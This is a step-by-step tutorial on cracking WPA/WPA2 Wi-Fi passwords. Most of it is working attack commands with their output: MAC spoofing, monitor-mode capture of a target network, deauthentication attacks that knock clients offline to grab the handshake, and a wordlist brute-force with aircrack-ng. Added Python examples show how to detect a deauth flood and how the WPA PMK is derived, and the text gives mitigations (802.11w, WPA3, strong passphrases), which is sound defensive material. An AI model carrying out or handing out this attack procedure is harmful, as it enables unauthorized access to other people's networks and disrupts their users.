WPA/WPA2 wireless network cracking
1. Check the network interface settings
# iwconfig
2. List the wireless network interfaces
# airmon-ng
3. Change the wireless interface's MAC address
# airmon-ng stop wlan0mon
- Monitor mode was started earlier, so stop it first
# macchanger --mac 7c:dd:90:ae:88:99 wlan0
[ERROR] Could not change MAC: interface up or insufficient permissions: Device or resource busy
- The error says the interface is up; bring it down first, then change the MAC
# ifconfig wlan0 down
# macchanger --mac 7c:dd:90:ae:88:99 wlan0
New MAC: 7c:dd:90:ae:88:99 (Shenzhen Ogemray Technology Co., Ltd.)
4. Enable monitor mode on the wireless interface
# airmon-ng start wlan0
5. View nearby wireless networks
# airodump-ng wlan0mon
- Run this in terminal 1
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- BSSID: the router's (AP's) MAC address
- PWR: signal strength; the smaller the value, the stronger the signal
- #Data: data frames captured
- CH: the channel the network is on
- ESSID: the Wi-Fi network name
6. Capture the packets of the target wireless network
# airodump-ng -c 1 -w wpa --bssid 00:11:22:33:44:55 wlan0mon
- Open a second terminal (terminal 2) for this
- -c is the channel
- -w is the prefix of the capture files (the wpa-04.cap used in step 8 comes from here)
7. Capture the handshake
Force the client to reconnect to the Wi-Fi by deauthenticating it.
Open a new window (terminal 3):
# aireplay-ng -0 3 -a BC:46:99:E9:1A:7C -c 90:AD:F7:57:E5:58 wlan0mon
- -0: deauthentication attack mode
- 3: number of attack rounds (3)
- -a: MAC address of the AP (the router)
- -c: MAC address of the client (the user's device)
root@kali:~# aireplay-ng -0 3 -a BC:46:99:E9:1A:7C -c 90:AD:F7:57:E5:58 wlan0mon
19:08:17 Waiting for beacon frame (BSSID: 6C:59:40:91:EE:B4) on channel 9
19:08:19 wlan0mon is on channel 9, but the AP uses channel 13
- If it reports an error like the channel mismatch above, rerun the command a few times
root@kali:~# aireplay-ng -0 3 -a BC:46:99:E9:1A:7C -c 90:AD:F7:57:E5:58 wlan0mon
19:39:17 Waiting for beacon frame (BSSID: 6C:59:40:91:EE:B4) on channel 13
19:39:18 Sending 64 directed DeAuth. STMAC: [34:08:BC:EE:3B:B6] [ 0| 0 ACKs]
19:39:19 Sending 64 directed DeAuth. STMAC: [34:08:BC:EE:3B:B6] [ 2| 1 ACKs]
19:39:19 Sending 64 directed DeAuth. STMAC: [34:08:BC:EE:3B:B6] [ 0| 0 ACKs]
- Check terminal 1: the end of the first line now shows WPA handshake
WPA handshake: 6C:59:40:91:EE:B4
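The transcript above shows what this step looks like on the air: each round of aireplay-ng sends 64 directed deauthentication frames to one station in well under a second, which is far above anything a normal AP does. That makes it a simple thing for a wireless IDS to detect. The following is an added example (not part of the original note or of the aircrack-ng suite): a sliding-window detector run over constructed 802.11 management-frame records. The record format (dict with ts/type/subtype/src/dst/bssid) and the second AP's address 02:00:00:00:00:01 are assumptions made for the example; the frame type/subtype numbers are the ones defined in the 802.11 standard.

```python
from collections import defaultdict, deque

# 802.11 management frames are type 0; subtype 0x8 = Beacon,
# 0xA = Disassociation, 0xC = Deauthentication (standard values).
BEACON = (0, 0x8)
DISASSOC = (0, 0xA)
DEAUTH = (0, 0xC)


def detect_deauth_flood(frames, window_s=5.0, threshold=10):
    """Raise one alert per BSSID the first time `threshold` or more
    deauth/disassoc frames are seen within `window_s` seconds.

    Returns a list of (bssid, window_start_ts, count) tuples.
    """
    recent = defaultdict(deque)  # bssid -> timestamps of recent deauth/disassoc
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda f: f["ts"]):
        if (f["type"], f["subtype"]) not in (DEAUTH, DISASSOC):
            continue
        q = recent[f["bssid"]]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window_s:  # drop frames outside the window
            q.popleft()
        if len(q) >= threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append((f["bssid"], q[0], len(q)))
    return alerts


def sample_frames():
    """Constructed sample traffic (not a real capture):
    - a beacon stream from the AP in the transcript,
    - one burst of 64 directed deauths to the station in the transcript
      (the burst size aireplay-ng reports),
    - a single deauth from a second, constructed AP, as a client leaving
      normally would produce."""
    ap = "6C:59:40:91:EE:B4"
    sta = "34:08:BC:EE:3B:B6"
    other_ap = "02:00:00:00:00:01"  # assumed locally-administered address
    frames = []
    for i in range(30):  # beacons roughly every 100 ms for 3 s
        frames.append({"ts": round(i * 0.1, 3), "type": 0, "subtype": 0x8,
                       "src": ap, "dst": "FF:FF:FF:FF:FF:FF", "bssid": ap})
    for i in range(64):  # 64 deauths within about one second
        frames.append({"ts": round(1.0 + i * 0.015, 3), "type": 0, "subtype": 0xC,
                       "src": ap, "dst": sta, "bssid": ap})
    frames.append({"ts": 2.0, "type": 0, "subtype": 0xC,
                   "src": other_ap, "dst": sta, "bssid": other_ap})
    return frames


if __name__ == "__main__":
    for bssid, start, count in detect_deauth_flood(sample_frames()):
        print(f"deauth flood from {bssid}: {count} frames starting at t={start}s")
```

The threshold of 10 frames in 5 seconds is deliberately low: legitimate deauthentication is rare and usually a single frame, while a burst is what the attack needs to work. On the mitigation side, 802.11w (Protected Management Frames) lets the AP and client authenticate deauth frames so that forged ones are ignored; WPA3 requires it.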
8. Brute-force with a wordlist
- The commands running in terminals 1 and 2 can be stopped now; open terminal 4
- The wordlists are in /usr/share/wordlists
# gunzip rockyou.txt.gz
- Once "WPA handshake" has appeared, the handshake has been captured and a .cap file has been written to the current directory
# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-04.cap
- -w: path to the wordlist
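What aircrack-ng does for every line of the wordlist is recompute the WPA/WPA2 pairwise master key and check it against the captured handshake. The derivation is fixed by IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 32 bytes). The following is an added example (not code from the original note or from aircrack-ng) that shows that derivation with Python's standard library, checked against the test vector published in the 802.11 standard (passphrase "password", SSID "IEEE"). It shows two things a defender needs: the SSID is the salt, so tables precomputed for common SSIDs transfer between networks with the same name, and the per-guess cost is a fixed 8192 HMAC-SHA1 calls, so the only thing that makes a wordlist attack fail is a passphrase that is not in any wordlist (or moving to WPA3-SAE, which does not expose an offline-guessable value).

```python
import hashlib
import string

# Values fixed by IEEE 802.11 for WPA/WPA2-PSK (not assumptions)
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32
HMAC_OUTPUT_LEN = 20  # SHA-1


def is_valid_passphrase(passphrase: str) -> bool:
    """802.11 allows 8 to 63 printable ASCII characters."""
    allowed = set(string.printable) - set("\t\n\r\x0b\x0c")
    return 8 <= len(passphrase) <= 63 and all(c in allowed for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes)."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def hmac_calls_per_guess() -> int:
    """PBKDF2 produces 20 bytes per block; 32 bytes needs two blocks of 4096
    iterations each, i.e. the work aircrack-ng spends on every wordlist entry."""
    blocks = -(-PMK_LEN // HMAC_OUTPUT_LEN)  # ceiling division
    return blocks * PBKDF2_ITERATIONS


if __name__ == "__main__":
    # Test vector from IEEE 802.11 Annex (PSK derivation examples)
    print(derive_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID -> different PMK: the SSID is the salt
    print(derive_pmk("password", "IEEE2").hex())
    print("HMAC-SHA1 calls per guess:", hmac_calls_per_guess())
```

Because the per-guess cost is fixed by the standard and cannot be raised by the network operator, the practical defences at the PSK level are passphrase length and randomness (a random passphrase near the 63-character limit is outside any wordlist) and, where hardware allows, WPA3.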
References:
1. Cracking Wi-Fi passwords (WPA/WPA2) with Aircrack on Kali Linux
2. Cracking WPA/WPA2 with Aircrack & hashcat
3. Hashcat: Cracking WPA2 WPA with Hashcat in Kali Linux
4. Principles and process of cracking WPA-PSK wireless networks